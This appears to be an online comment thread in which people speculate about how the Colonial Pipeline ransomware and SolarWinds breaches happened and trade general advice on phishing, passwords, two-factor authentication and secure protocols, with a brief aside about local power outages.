The biggest problem is how they are getting in. It’s never really disclosed but honestly the majority of these hacks are done the same way. Someone downloads malware from a suspicious email or maybe a password gets guessed because people are lazy and will make easily guessable passwords (not judging I’m equally guilty)
I doubt there is any technical tv style hacking magic going on maybe a little coding. But 95% of all of this can be still stopped pretty cold with really basic cyber security steps. Problem is you need buy in, enforcement, etc. In all infastructe industriess two factor ID should be standard, something at this level probably should’ve had two factor ID along with a two factor sign off from another preferably senior individual.
People are stupid. Filling up tubs with gas? No problem people getting beat for doing that.
On a side note, seems like electricity with Oncor has been worse than normal since the freeze. I believe we are at 4 times now power going out with twice being multiple hours. Not even during storms, last one was multiple hours after a storm had passed. Are there still some issues with lines/infrastructure or just random that we have had so many power issues?
Yes a lot of it is low tech stuff. But we dealt with
russian hackers ages ago and busted a group that
had setup shop near our data center. Some of the
guys on our team even feared personal retribution from them. 2 factor is fine and dandy but some of the devices you manage like routers and switches its hard to implement , so you setup trusts with keys between “secure” servers and devices. And monitor the logs closely. These guys will sniff the networks . If they plant some code on your servers you are in trouble. Using encryption is a must and only using secure protocols (sftp vs ftp) . But they are good and may have access to thousands of nodes of state sponsored super computers for cracking. Its a constant battle responding to cert advisories ( and there are a lot) and keeping your gear up and running.
But I think you are right in that most breakins are phishing and installed malware by unsuspecting staff. We dont know the details about the pipeline hack , and publicly we may never know. But the sophisticated stuff does happen.
Randy, I think I agree they were different types of breaches. The pipeline thing
sounds like ransomware that is most often result of the victims unwittingly assisting
in installing stuff via downloading. The SolarWinds thing sounded very serious and sophisticated
as I read source code of the Orion software was modified and a cyber security firms
Network was penetrated , presumably by use of the Orion monitoring software.
That’s just my understanding from general media sources I’ve read.
I think it would be helpful if the FBI would be more transparent about the details of
all these incidences and did live demo re-enactments of how these events unfolded.
We are not reaching enough or the right folks imho.
That’s my understanding too. Solarwinds went on for months and without anyone knowing. It seems like it was more about getting data for the Russian Govt.
The Colonial pipeline breach was a ransomware attack where immediate money was the goal. It seems there were different players with different goals which lead to different short term outcomes.
That’s just what I’m seeing in public. We will probably learn more over time.
And then to add a little twist to it, perhaps the in-house IT staff intentionally worked with
the ransomware folks. Could the FBI even find out if an individual has a cryptocurrency account with a big deposit ? Or disgruntled former employee left a cron job to load it. As far as I know, that’s never happened…but probably just matter of time before it’s done.